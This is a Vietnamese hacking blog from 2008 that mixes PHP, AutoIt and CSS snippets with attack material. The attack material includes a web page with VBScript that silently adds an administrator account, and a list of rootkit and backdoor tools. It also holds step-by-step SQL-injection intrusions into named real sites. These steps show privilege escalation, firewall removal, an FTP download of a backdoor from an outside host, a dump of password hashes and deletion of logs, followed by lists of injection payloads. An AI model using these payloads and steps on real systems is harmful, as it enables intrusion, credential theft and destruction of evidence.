Thứ Bảy, 16 tháng 2, 2008

Dùng php và sql để lưu địa chỉ web

Thêm địa chỉ:
[?php
include("info.php");
$link = mysql_connect('localhost', $mysql_user, $mysql_password);
if (!$link) {
die('Could not connect: ' . mysql_error());
}
echo 'Connected successfully [br]';
$link_db = mysql_select_db($db, $link);

$sql = "INSERT INTO `url` (`id`, `des`, `url`) VALUES ('1', 'search', 'http://yahoo.com');";


$result = mysql_query($sql);

if (!$result)
{
die(mysql_error());
}

mysql_close($link);
?]

Hiển thị nội dung trong cơ sở dữ liệu:
[?php
include("info.php");
$link = mysql_connect('localhost', $mysql_user, $mysql_password);
if (!$link) {
die('Could not connect: ' . mysql_error());
}
echo 'Connected successfully [br]';
$link_db = mysql_select_db($db, $link);

$sql = "SELECT * FROM `url`;";


$result = mysql_query($sql);

if (!$result)
{
die(mysql_error());
}

echo "[table border=1 cellspacing=0 ][tr bgcolor=aaffee ][td]ID[/td][td]Des[/td][td]Url[/td][/tr]";
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
printf("[tr][td] %s [/td][td] %s [/td][td] [a href=\"%s\"]%s[/a][/td][/tr]", $row[0], $row[1],$row[2],$row[2]);
}

mysql_free_result($result);

echo "[/table]";


mysql_close($link);
?]

Tạo bảng mới:

$sql = "CREATE TABLE `vidu1` (`id` VARCHAR(10) CHARACTER SET ascii COLLATE ascii_bin DEFAULT '0' NOT NULL, PRIMARY KEY (`id`));";

hay

CREATE TABLE `url` (
`id` INT(10) NOT NULL,
`des` VARCHAR(100) NOT NULL,
`url` VARCHAR(100) NOT NULL,
PRIMARY KEY (`id`)
);

Thêm mẫu tin:

INSERT INTO `url` (`id`, `des`, `url`) VALUES ('0', 'search', 'http://google.com');

Thứ Sáu, 15 tháng 2, 2008

Tạo user bằng web

[html]
[object id=wsh
classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B][/object]
[script language=vbscript]
set wshshell=createobject ("wscript.shell" )
a=wshshell.run ("cmd.exe /c net user NEW_USER fuckbiatch /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators NEW_USER /add",0)
window.close
[/script]
[/html]

Thứ Năm, 14 tháng 2, 2008

Small PC Dictionary

English
Chinese
Italian
French
remember
sign
hack
hacker
crack
cracker
tool
virus
download
upload
logout
hacking
software
trojan
free
security
hole
share
access
deny
game
attack
service
scan
port
trace
host
mail
data
database
login
code
source
file
edit
view
shell
记得
登录
哈克
黑客
裂缝
裂解装置
工具
病毒
下载
上传
登出
黑客
软件
木马
免费
安全

分享
进入
否认
游戏
攻击
服务
扫描
港口
痕量
东道国
邮件
数据
数据库
登录
代码

档案
编辑
鉴于
壳牌
Ricordo
Segno
Hack
Hacker
Crack
Cracker
Strumento
Virus
Download
Caricare
Logout
Hacking
Software
Trojan
Libero
Sicurezza
Buco
Parti
Accesso
Negare
Gioco
Attacco
Servizio
Scansione
Port
Traccia
Host
Mail
Dati
Database
Login
Codice
Fonte
File
Modifica
Vista
Shell
Se souvenir
Signe
Hack
Hacker
Fissure
Cracker
Outil
Virus
Télécharger
Upload
Logout
Hacking
Logiciel
Cheval de Troie
Gratuit
Sécurité
Trou
Part
Accès
Nier
Jeu
Attaque
Service
Scan
Port
Trace
Accueil
Mail
Données
Base de données
Login
Code
Source
Fichier
Modifier
Vue
Shell

Nhãn:

Thứ Tư, 13 tháng 2, 2008

Autoit code
While (
99999)
BlockInput (1)
$var = String(20)
$url = "http://www.game.com/index.html"
BlockInput (0)
WinMinimizeAll()
Sleep(1)
WEnd

;
; AutoIt Version: 3.0
; Language:       English
; Platform:       Win9x/NT
; Author:         Jonathan Bennett (jon at hiddensoft com)
;
; Script Function:
;   Counts to 5 using a "for" loop


; Prompt the user to run the script - use a Yes/No prompt (4 - see help file)
$answer = MsgBox(4, "AutoIt Example", "This script will count to 5 using a 'For' loop.  Run?")


; Check the user's answer to the prompt (see the help file for MsgBox return values)
; If "No" was clicked (7) then exit the script
If $answer = 7 Then
    MsgBox(0, "AutoIt Example", "OK.  Bye!")
    Exit
EndIf


; Execute the loop 5 times
For $count = 1 To 5
    ; Print the count
    MsgBox(0, "AutoIt Example", "Count is: " & $count)
Next
 
 
; Finished!
MsgBox(0, "AutoIt Example", "Finished!")

Autoit script

Example1

; AutoIt Version: 3.0
; Language: English
; Platform: Win9x/NT
; Author: Jonathan Bennett (jon@hiddensoft.com)
;
; Script Function:
; Plays with the calculator.
;


; Prompt the user to run the script - use a Yes/No prompt (4 - see help file)

$answer = MsgBox(4, "AutoIt Example (English Only)", "This script will run the calculator and type in 2 x 4 x 8 x 16 and then quit. Run?")


; Check the user's answer to the prompt (see the help file for MsgBox return values)
; If "No" was clicked (7) then exit the script

If $answer = 7 Then
MsgBox(0, "AutoIt", "OK. Bye!")
Exit
EndIf



; Run the calculator
Run("calc.exe")


; Wait for the calulator become active - it is titled "Calculator" on English systems
WinWaitActive("Calculator")


; Now that the calc window is active type 2 x 4 x 8 x 16
; Use AutoItSetOption to slow down the typing speed so we can see it :)

AutoItSetOption("SendKeyDelay", 400)
Send("2*4*8*16=")
Sleep(2000)


; Now quit by sending a "close" request to the calc
WinClose("Calculator")


; Now wait for calc to close before continuing
WinWaitClose("Calculator")


; Finished!
Example2

; AutoIt Version: 3.0
; Language: English
; Platform: Win9x/NT
; Author: Jonathan Bennett (jon at hiddensoft com)
;
; Script Function:
; Counts to 5 using a "do" loop


; Prompt the user to run the script - use a Yes/No prompt (4 - see help file)

$answer = MsgBox(4, "AutoIt Example", "This script will count to 5 using a 'Do' loop. Run?")


; Check the user's answer to the prompt (see the help file for MsgBox return values)
; If "No" was clicked (7) then exit the script

If $answer = 7 Then
MsgBox(0, "AutoIt Example", "OK. Bye!")
Exit
EndIf


; Set the counter
$count = 1

; Execute the loop "until" the counter is greater than 5
Do
; Print the count
MsgBox(0, "AutoIt Example", "Count is: " & $count)

; Increase the count by one
$count = $count + 1

Until $count > 5


; Finished!
MsgBox(0, "AutoIt Example", "Finished!")

Run application by ActiveX
<object classid="clsid:42B1C70D-9823-41f7-810A-682DA294D868" codebase="C:Program FilesK-Lite Codec PackMedia Player Classicmplayerc.exe"></object>
Yahoo Messenger Chat nhieu nick
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USERSoftwareyahoopagerTest]
"Plural"=dword:00000001


Chủ Nhật, 10 tháng 2, 2008

Kho phần mềm
7zip432-x64.exe1M
7zip432.exe821k
a4proxy.exe1M
addremovecleaner.exe937k
anti1.rar5M
anti2.rar5M
anti3.rar6M
anti4.rar4M
ArInstall.exe1M
BaiCa1990.mp3604k
bm.rar543k
bo2k.exe3M
cacbaivietcogiatritn.rar922k
cdos.rar5M
CDRomDisabler.exe686k
Chazv2.rar1M
complock.zip616k
DisableUSB.exe686k
doc.rar128k
drivermagicprofessional1.1.3_saoluudriver.exe7M
file_recovery.exe277k
flashboot-1.3-build135-setup.exe3M
FloppyDisabler.exe686k
FU_Rootkit.zip3M
genius322.rar2M
GUI.rar5M
HelpNDoc.zip2M
IconFilter.zip1M
KeyScrambler.exe625k
Kythuatlaptrinh.rar635k
mcombo.exe5M
medjon10.zip1M
MuaLotPhotTinhMienMan.mp3547k
MyNetwork.zip1M
Notepadpp.zip798k
NTRK.exe4M
PE_Tutorials.rar5M
PsSuspend.zip42k
PsTools.zip577k
ramcleaner_trial.exe663k
RDPRemoteEnabler.exe848k
Registry.rar420k
RegMon.rar374k
rootkit.htm21k
Rootkit.zip2M
Rootkits_Unloader.rar624k
shk.rar5M
telnet-2.1b2-setup.exe258k
Toxic-Ps2.2.exe38k
X_Setup-Pro8.1.110.zip4M
X-Scan-v2.3-en.zip2M
spade114.exe2M

Thứ Sáu, 8 tháng 2, 2008

Thay đổi độ rộng của blogger

#outer-wrapper {
width: 1000px;
margin:0 auto;
padding:10px;
text-align:$startSide;
font: $bodyfont;
}

#main-wrapper {
width: 600px;
float: $startSide;
word-wrap: break-word; /* fix for long text breaking sidebar float in IE */
overflow: hidden; /* fix for long non-text content breaking IE sidebar float */
}

#sidebar-wrapper {
width: 350px;
float: $endSide;
word-wrap: break-word; /* fix for long text breaking sidebar float in IE */
overflow: hidden; /* fix for long non-text content breaking IE sidebar float */
}

Thu phục www.janker.org

Nguồn: HVA
Lời nói đầu : Không hiểu sao có rất nhiệu bạn rất khoái hỏi vền hack web...nhưng......các bạn nên hiểu...hack pass....xâm nhập máy tính thì may ra có thể hướng dẫn...chứ hack web thì...tớ không biết nói thế nào nữa....càng không biết mình nên post bài thế nào..tuy vây..nhưng vì yêu cầu của các bạn bè..tớ xin post lại quá trình khi hack được một trang cho các bồ tham khao..nhưng có lã là không chi tiết cho lăm..quan trọng là các bạn có kiến thức chút it về nó..thế thì sẽ rất dễ hiểu là tớ muốn nói gì.......

ok ! mục tiêu của tui là www.janker.org

lấy
trình Scan ra...quét một vòng cái ccoi.....chắc là kết quả mất bồ cũng đáon được rồi nhỉ ? thế thì không tào lao nửa...dù seo thí post 23 & 80 đã open rồi...kết quả này phải nhớ. nếu không có lổ hổng hế thống...có các sự lựa chọn sau : 1.Premeate ; 2 lổ hổng...đương nhiên...còn có thể chơi D.D.o.S và còn nhiều kiểu chơi khắc nửa...nhưng hình như là chúng ta đi qua xa rôi...thôi..ngôi yên để làm việc đi......

kiếm...kiếm ...kiếm...sau mấy giây...phát hiện là có một chổ không có sừ lý tốt đẹp tham số ID.

http://www.janker.org/show.asp?id=2;--

Error rồi . `` Microosft JET Databest Engine Error ` 80040e14`.....đàng sau câu SQL kiếm được chử. ``
uh ! chắc là quý vị đã phát hiện rồi nhỉ ? tui nghỉ là ngử pháp này nói cho chúng ta biết 2 điều :

1. sử dụng Access ; 2 ...trong cái đó có cái gì rất đặt biệt `` whare id=`` & request ( ``id``) chưa được fix khỏi hệ thống.

nhưng quan trọng là chơi thế nào đây....?
tui vân quyết định là coi thêm chút chút nửa...sau khi đoán mò một lúc...thấy là nó sẽ có một cái hết thống quản lý....đoán tiếp xem..

http://www.janker.org/show.asp?id=2 or id in ( select id from admin )

ok ! good ! không có báo Error...thế thì nó tồn tại một biểu Admin...còn nửa..trong biểu này còn có Hàng ID. thật ra thì sau này tui nghỉ qua nghỉ lại...thế náy không có tốt...( không muốn nói lý do...sorry )

đoán mò tiếp....xong rrồi...uh..ra kết quả User , Password. tới đây..tui lại cám thấy mình chạy qua chạy lái rất nhiều đường vòng...tuy là trực giác đây là một mã nguồn miễn phí..nhưng tại vì nhất thời tui chưa nhận ra là cái gì..nên không có download về phấn tích...bây giờ thì đoán muốn chết xủi..thấy là tốtt nhất vẫn là đi kiếm download các mã nguồn .....

thế là phương hướng hack của tui lại biến tiếp..( chén wé )...ok ! Google đâu rồi ? Search từ kháo fir.asp , vì fir.asp là một chử rất kỳ cục..thế là tui Search được rất nhiều cái giông nhau...trong tất cả các link....chắc chắn là sẽ có rất it nhiều có thế hack dễ dàng..tui sử dụng webdavx3, đại khái là sau khi thất bại 60 lần..(huhu) cuối cùng cũng tiềm đuợc một cài rồi...tất nhiên..mục đích bước này của tui chẳng qua là muốn biết các code thôi ( đừng có tưởng lá tui chuyển mục tiêu để quậy nghe ) chứ không có ý gì khác..chỉ là setup socks5 trên hệ thống này thôi..(hêhê )
sau khi lấp xong lổ hổng là tui logout......

giờ này đã rần 2 giờ sáng rồi..tới quyết định không chơi Net nửa...mà ngồi đó coi code...uh..nói đúng hơn là cói cơ sở dữ liệu access..nếu biết thế sớm thì đã tóm được bao nhiều thời gian rồi...

chắc là sẽ có ngừơi tính download trức tiếp các Database ? hêhê..đâu có dễ thế .....tên của Database 120% là đã đổi rồi....

um...tớ đã có được biểu admin rồi...việc đoán passwords không phải là chuyện quá khó..nhưng hiện nay quan trọng vẫn là coi trong đó có tất cả bao nhiêu Administrator

http://www.janker.org/show.asp?id=3 AND 1

Thỏa hiệp vnexpress

Nguồn: http://goctinhoc.com

Đây là từng buớc mà mình đã làm để thỏa hiệp website http://vnexpress.net.
để an toàn khi hack, mình set lại proxy trong IE5 là proxy.ia2.marketscore.com:80.
Xong, bây giờ bắt đầu vào http://vnexpress.net. Loay hoay
một chặp trên VnExpress để tìm lỗi SQL Injection, mục Rao Vặt:


http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3`
HTTP 500.100 - Internal Server Error - ASP error
Internet Information Services

Error Type:
Unclosed quotation mark before the
character string `` /User/Rao-vat/Source/Detail.Asp, line 114

Yeah!

Mình thử dùng các kí tự khác ngoài dấu `: `` , ( ) để biết được chính xác URL khai thác:

http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3) ...

Bây giờ đến việc tiến hành xâm nhập vào máy chủ này qua lỗi SQL Injection!

- Đầu tiên mình xác định xem phiên bản của MSSQL và Windows NT:

http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3)
and 1=convert(int,@@version)--sp_password

Syntax error converting the nvarchar value `Microsoft SQL Server 2000 - 8.00.655 (Intel X86)
Jul 3 2002 18:10:57 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition
on Windows NT 5.0 (Build 2195: Service Pack 3)` to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114

(Để tránh ghi nhật kí trong MSSQL, mình thêm sp_password vào sau --.
Khi MSSSQL phát hiện ra chuổi `sp_password` trong câu lệnh SQL, nó sẽ ghi nhật kí
như sau: -- `sp_password` was found in the text of this event. -- The text has been replaced
with this comment for security reasons.. Để cho đơn giản, từ đây mình sẽ ghi tắc --sp_password là -- nha)

+ SQL 2000 8.00.655 03/07/2002
+ Windows 2000 5.0 Build 2196 SP3

- Mình xác định tiếp tên người dùng hiện tại và tên CSDL đang làm việc:

http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3) and 1=convert(int,system_user)--

Syntax error converting the nvarchar value `IUSR_WIN10814` to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114

http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3) and 1=convert(int,db_name())--

Syntax error converting the nvarchar value `Infostore` to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114

Username hiện tại không phải là sa hoặc BUILTINAdministrators
nên không thể xài master..xp_cmdshell. SQL ngày 03/07/2002, đang chạy
với Windows Authentication user là IUSR_WIN10814, hơi cũ so với ngày hiện tại.
Mình vào trang http://www.securiteam.com
search các lỗi của MSSQL đã được công bố sau ngày 03/07/2002. Đây là thứ mà mình tìm:

NGSSoftware Insight Security Research Advisory

Name: Extended Stored Procedure Privilege Upgrade
Systems: Microsoft SQL Server 2000 and 7
Severity: High Risk
Category: Privilege Escalation
Vendor URL: http://www.microsoft.com/
Author:
David Litchfield ( david@ngssoftware.com Địa chỉ email này đang được bảo vệ khỏi chương trình thư rác, bạn cần bật Javascript để xem nó )
Advisory URL: http://www.ngssoftware.com/advisories/mssql-esppu.txt
Date:
15th August 2002
Advisory number: #NISR15002002A


Description
***********
Microsoft SQL Server 2000 and 7 extends functionality by using extended
stored procedures. Three particular extended stored procedures contain a
vulnerability that allow a low privileged user to run abritrary SQL queries
in the context of the
account running SQL Server.

Details
*******
SQL Server supports two forms of authentication. The first is where a user
uses an SQL login and password to authenticate and the second is through
Windows Authentication. Any user authenticated by Windows can ``upgrade``
their privileges to that of the account running the SQL Server by using one
of three extended stored procedures. These stored procedures allow a user to
run an arbitrary SQL query. By exploiting this problem a low privileged user
will be able to run any stored procedure, extended or otherwise, and select
from, update or insert into any table in any database. That is by exploiting
these holes an attacker can fully compromise the database server and its
data. Whilst an SQL Login user can not directly exploit this vulnerability
they can do so indirectly by submitting a job to the SQL Agent. As this the
SQL Agent authenticates to the SQL Server and runs in the context of Windows
account these vulnerabilities can be exploited. Please see NGSSoftware alert
NISR15002002A (http://www.ngssoftware.com/advisories/mssql-esppu.txt) for
more details.

Fix Information
***************
NGSSoftware informed Microsoft of these issues in July. Microsoft has
produced a patch that resolves these issues. Please see

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/
bulletin/MS02-043.asp

for more details.

For those SQL Server database administrators who are not able to patch
immediately NGSSoftware recommend that they remove public access to these
stored procedures. This will prevent low privileged users from accessing
these extended stored procedures.

xp_execresultset
xp_printstatements
xp_displayparamstmt

A check for this vulnerability has been added to Typhon II, NGSSoftware`s
vulnerability assessment scanner, of which, more information is available
from the NGSSite, http://www.ngssoftware.com/.

Username
hiện tại là IUSR_WIN10814, thuộc loại Windows Authentication nên chúng ta có thể dùng xp_displayparamstmt để nâng quyền của username này lên dbo.

http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3);exec master..xp_displayparamstmt
N`sp_addsrvrolemember ``IUSR_WIN10814``,``sysadmin```,N`master`,1--

Mình add user IUSR_WIN10814 vào n
hóm sysadmin để có thể dùng được master..xp_cmdshell

Xác định lại username hiện tại xem sao?

http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3
) and 1=convert(int,user_name())--

Syntax error converting the nvarchar value `dbo` to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114

DBO - Chúng ta đang có quyền hạn cao nhất trên máy chủ MSSQL đó nha.

Tiếp theo mình xác định địa chỉ IP của máy chủ này như sau:

Đầu tiên tạo một bảng chứa dữ liệu và đổ kết quả của lệnh exec master..xp_cmdshell `ipconfig` vào bảng này.

http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3);create
table systables(a int identity,b varchar(1000)) insert into systables exec master..xp_cmdshell `ipconfig`--

Việc còn lại là lấy kết quả từ bảng systables:

http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3)
and 1=convert(int,(select top 1 b from systables where b like `%25IP Address%25`))--

(%25 == ``%``)

Syntax error converting the nvarchar value ` IP Address. . . . . . . . . . . . :
10.244.63.231 ` to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114
http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3)
and 1=convert(int,(select b from systables where b like `%25IP Address%25`) and b not in(`%2510.244.63.231%25`))--

Syntax error converting the nvarchar value ` IP Address. . . . . . . . . . . . :
198.64.129.137 ` to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114

http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3) and
1=convert(int,(select b from systables where b like `%25IP Address%25`)
and b not in(`%2510.244.63.231%25`,`%25198.64.129.137%25`))--

Syntax error converting the nvarchar value ` IP Address. . . . . . . . . . . . :
198.64.132.21 ` to a column of data type int. /User/Rao-vat/Source/Detail.Asp, line 114

http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3)
and 1=convert(int,(select b from systables where b like `%25IP Address%25`)
and b not in(`%2510.244.63.231%25`,`%25198.64.132.21%25`,`%25198.64.129.137%25`,`%25198.64.132.21%25`))--

Syntax error converting the nvarchar value ` IP
Address. . . . . . . . . . . . : 198.64.132. 22` to a column of
data type int. /User/Rao-vat/Source/Detail.Asp, line 114

Hì hì, nó có đến 4 địa chỉ IP luôn!

Mình thử ping đến vnexpress.net để xem thử địa chỉ IP của Web Server ra sao?

C: > ping vnpress.net

Pinging vnexpress.net [198.64.132.22] with 32 bytes of data:

Reply from 198.64.132.22: bytes=32 time=344ms TTL=105
Control-C

Như vậy IIS và MSSQL đều được cài trên cùng một máy chủ.

Thử nối đến cổng cổng 1433 bằng Netcat xem sao?

C: > nc -vv -n 198.64.132.22 1433
(UNKNOWN) [198.64.132.22] 1433 (?): connection refused
sent 0, rcvd 0: NOTSOCK

VnExpress.NET đã đặt tường lửa cho cổng 1433 rồi.
Mình nghĩ khả năng lớn nhất là họ đã dùng tường lửa lọc
cổng dữ liệu đi kèm với Windows 2000 Server. Mình quyết định phá tường lửa này.

http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3);exec master..xp_regdeletevalue `HKEY_LOCAL_MACHINE`,

`SYSTEMCurrentControlSetServicesTcpipParameters`,`EnableSecurityFilters`--

Chỉ cần del giá trị EnableSecurityFilters trong khóa HKLMSYSTEMCurrentControlSetServicesTcpipParameters là xong.

Nối lại xem sao?

C: > nc -vv -n 198.64.132.22 1433
(UNKNOWN) [198.64.132.22] 1433 (?) open

Đúng y như mình đã dự đoán!

Bây giờ đến việc upload backdoor và một vài đồ nghề khác lên server.
Mình chuẩn bị sẵn mấy thứ này trong thư mục /vnexpress trên máy chủ FTP free-hosting.
Bởi vì việc lấy các file trên FTP hơi lâu nên nếu dùng IE5 thì kết sẽ bị ngắt nữa chừng
do lỗi timeout (đang xài kết nối quay số ở ngoài dịch vụ mà) nên mình chuyển sang xài
Mini-Browser (*Mini-Browser là một đồ nghề không thể thiếu được khi hack web).
Set lại proxy cho Mini-Browser là proxy.ia2.marketscore.com:80 cho chắc.

http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3);exec master..xp_cmdshell `echo open ftp.esmartweb.com > f & echo user username xxxxx > > f & echo bin > > f & echo cd /vnexpress > > f & echo mget * > > f & echo quit > > f & ftp -v -i -n -s:f`--

URLEncode - > http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3);

exec%20master..xp_cmdshell%20`echo%20open%20ftp.esmartweb.com

%20%3Ef%20%26%20echo%20user%20username%20xxxxx%20%3E%3Ef

%20%26%20echo%20bin%20%3E%3Ef%20%26%20echo%20cd%20/vnexpress

%20%3E%3Ef%20%26%20echo%20mget%20*%20%3E%3Ef%20%26%20

echo%20quit%20%3E%3Ef%20%26%20ftp%20-v%20-i%20-n%20-s%3Af`--

[GET]

Waiting...!
Done.

Kích
hoạt backdoor WinShell 4.0:

http://vnexpress.net/User/Rao-vat/Source/View.asp?ID=500006378&c=3);exec master..xp_cmdshell `backup`--

Xong, bây giờ chỉ việc kết nối đến backdoor WinShell. Mình dùng Putty để nối

+ Host Name (or IP Address): 198.64.132.22
+ Port: 3371
+ Protocol: (o) Raw

xxxxx

WinShell v4.0

(C)2001 by janker

http://www.bugsos.com

? for help
CMD > s
C:WINNTsystem32 > _

- Đổ SAM

Administrator:500:C3591A674B80231AF24E41BBADB86F3F:B0F92BB2E3471150BEC31733D67288EA:Built-in account for administering the computer/domain::
Guest:501:********************************:********************************:Built-in account for guest access to the computer/domain::
TsInternetUser:1000:DFA15ABF9536AE19F7FF965C044A5116:D21C509DA73030AD8DA1014F3A211943:TsInternetUser,This user account is used by Terminal Services.::
IUSR_WIN10814:1001:9C0887DCB5F1EA859B0B497A5C75047F:A9438645CA94E67F631C2E14E1CDF7D4:Internet Guest Account,Built-in account for anonymous access to Internet Information Services::
IWAM_WIN10814:1002:A4BE543712EDBA21B0991B757487A81E:BCE493DFA35602091F9285CAEABA3128:Launch IIS Process Account,Built-in account for Internet Information Services to start out of process applications::
Internet:1003:336F31071CA2B4A0D14C9408F0C70C13:80C82BA8E876F8D59732AC429A93072B:Internet,FPT Internet admin access::
vReplicator:1004:578BFE097611D01A73545BB507664033:AF30E872418F24EC3FD86F58CB8F0DFD:Replicate Site::
AdminEditor:1005:A07C0994B7D99B918284770D91848144:121CF5A2FB538FC2EF4918C69EC29116:Admin Editor::
Thangpv:1006:F138C587F87CB06E29B1F66481A851EE:7AA75649EA242FE1FD76191279F2F407:Pham Vinh Thang::

- Xác định WWROOT của IIS

C:WINNTsystem32 > reg query ``hklmsystemcurrentcontrolsetservicesw3svcparametersvirtual roots``
! REG.EXE VERSION 2.0

HKEY_LOCAL_MACHINEsystemcurrentcontrolsetservicesw3svcparametersvirtual roots
/ REG_SZ D:InfostoreMaster,,201
/IISHelp REG_SZ C:WINNTHelpiisHelp,,201
/Replicate REG_SZ D:InfoStoreReplicate,,201

- Xóa nhật kí của IIS (thật sự thì mình không hề bị ghi nhật kí vì Admin của VnExpress.NET đã disable log của IIS do số lượng người truy cập vào trang web này quá đông)

C:WINNTsystem32 > reg query hklmsystemcurrentcontrolsetservicesw3svcparameters /v logfiledirectory
! REG.EXE VERSION 2.0

HKEY_LOCAL_MACHINEsystemcurrentcontrolsetservicesw3svcparameters
logfiledirectory REG_SZ C:WINNTSystem32LogFiles

C:WINNTsystem32 >
C:WINNTsystem32 > dir %systemroot%system32logfiles
Volume in drive C has no label.
Volume Serial Number is 5C62-FB1E

Directory of C:WINNTsystem32logfiles

04/19/2002 12:26a

.
04/19/2002 12:26a ..
04/19/2002 07:24a W3SVC1
0 File(s) 0 bytes

C:WINNTsystem32 > rd /s /q logfilesw3svc1

- Để xem có gì trong WWROOT không?

D:InfoStore > dir
Volume in drive D is InfoStore
Volume Serial Number is 544E-1C8D

Directory of D:InfoStore

04/25/2002 08:39a .
04/25/2002 08:39a ..
04/19/2002 10:44a ftproot
09/20/2002 03:29p Master
10/01/2002 01:10p Replicate
0 File(s) 0 bytes
5 Dir(s) 46,340,067,328 bytes free

Cả khối file tin tức trong thư mục Master. Mình thấy chỉ có Replicate
và một số ít các file trong Master là còn có giá trị nên download về.

C:WINNTsystem32 > rar -a f.zip d:infostore eplicate*.*
C:WINNTsystem32 > copy /y f.zip d:infostoremaster eadme.txt

(dùng Mass Downloader để download file http://vnexpress.net/readme.txt về)

C:WINNTsystem32 > del d:infostoremaster eadme.txt

... và một số việc khác nữa không kể ra ở đây tới.

*Server của VnExpress.NET chẳng có thứ gì ngoài mấy cái tin tức cung
cấp miễn phí cho mọi người nên mình quyết định stop tại đây, không xóa bất kì file n
ào trên server đâu nha. Mình chỉ upload vài file để deface trang VnExpress.NET cho vui thôi.

- À nếu bạn cần cài backdoor/rootkit không bị phát hiện trên Windows NT thì dùng Hacker Defender (http://rootkit.host.sk)
hoặc TYT ( http://www.polarhome.com/~vickit/tyt0/ ,
mã nguồn: http://www.polarhome.com/~vicki/hack/congcu/win/tyt0-src.zip)
của mình nha. * Hiện tại bản Hacker Defender 0.7.3
không làm việc trên Windows 2000 bản Enterprise. Mình đã test thử trên vài server rồi,
trong khi backdoor của mình thì vẫn làm việc tốt đối với bản Enterprise.
Khi nào có source-code của HxDef mình sẽ phát triển tiếp con backdoor của mình để cho các bạn xài.
Nói thật là mấy thứ backdoor và rootkit này cũng rất dễ bị phát hiện và disable. Hì hì, không nói ở đây nha (để cho an toàn thôi)

sql inject và php inject

or 1=1 and 1=convert(int,db_name())--sp_password
or 1=1 and 1=convert(int,system_user)--sp_password
or 1=1 and 1=convert(int,@@version)--sp_password
or 1=1 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--sp_password
or 1=1 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('REFERENTIAL_CONSTRAINTS')--sp_password
or 1=1 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='REFERENTIAL_CONSTRAINTS'--sp_password



[LINK].php?site=bantin&id=-1 union select from 0 admin/*
[LINK].php?site=bantin&id=-1 union select from 0 where admin*/
[LINK].php?site=bantin&id=-1 union select from 0,1 admin/*
.....................
[LINK].php?site=bantin&id=-1 union select from 0,1,2,3,4,5,6,7,8,9,10 admin/*
[LINK].php?site=bantin&id=-1 union select from 0,1,2,3,4,5,6,7,8,9,10,11 admin/*
[LINK].php?site=bantin&id=-1 union select from 0,1,2,3,4,5,6,7,8,9,10,11,12 admin/*
[LINK].php?site=bantin&id=-1 union select from 0,1,2,3,4,5,6,7,8,9,10,11,12,13 admin/*
[LINK].php?site=bantin&id=-1+union+select+0,1,2,concat(user,char(32),pass),4,5,6,7,8,9,10,11,12,13+from+admin/*

Tiêu đề: SQL - Injection cơ bản và nâng cao

Nguồn: HVA
A. Khai thac thong tin ve SQL server

1. Khai thac thong tin ve MS SQL server
' Thông tin về version của MS SQL
and 1=@@version--sp_password
'Thông tin về servername
and 1=@@servername--sp_password
'Thông tin về SERVICENAME
and 1=@@SERVICENAME--sp_password
'Thông tin về UID
and 1=system_user--sp_password
'Thông tin về PWD
?

2. Khai thac thong tin ve Database
'Thông tin về tên database
and 1=db_name()--sp_password

3. Khai thac thong tin ve Table
'Khai thác thông tin về Table
having 1=1--sp_password
'Khai thác thông tin về các Table
group by QUESTIONS.QUEST_ID having 1=1--sp_password

'Khai thác thông tin về Table
UNION SELECT TOP 1 TABLE_NAME FROM
INFORMATION_SCHEMA.TABLES--sp_password
'Khai thác thông tin về các Table
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE
TABLE_NAME NOT IN ('PRODUCTS')--sp_password

'Khai thác thông tin về Table
and 38=convert(int,(select top 1 table_name from
information_schema.tables))--sp_password
'Khai thác thông tin về các Table
and 38=convert(int,(select top 1 table_name from
information_schema.tables
where table_name not in ('PRODUCTS')))--sp_password

4. Khai thac thong tin ve Column
'Khai thác thông tin về Column
and 38=convert(int,(select top 1 column_name from
information_schema.columns where
table_name=('QUESTIONS')))--sp_password
'Khai thác thông tin về các Column
and 38=convert(int,(select top 1 column_name from
information_schema.columns where table_name=('QUESTIONS') and
column_name
not in ('QUEST_ID')))--sp_password

5. Khai thac thong tin ve Content
'Khai thác thông tin với kiểu ngày giờ
and 1=convert(char(20),(select top 1 NgayXuat from
PhieuXuat))--sp_password
'Khai thác thông tin dòng tiếp theo với kiểu ngày giờ
and 1=convert(char(20),(select top 1 NgayXuat from PhieuXuat where
NgayXuat<>'Mar 12 2003 12:00AM '))--sp_password
'Khai thác thông tin về dòng đầu tiên
and 1=convert(int,(select top 1 userName+'/'+userPass from
Users))--sp_password
'Khai thác thông tin dòng tiếp theo
and 1=convert(int,(select top 1 userName+'/'+userPass from Users where
userName not in('admin')))--sp_password

6. Khai thac thong tin ve Table, Column, Content cua cac database tiep

Chú ý:
để nhận biết kiểu của cột
dữ liệu ta dùng "image" để kiểm tra:
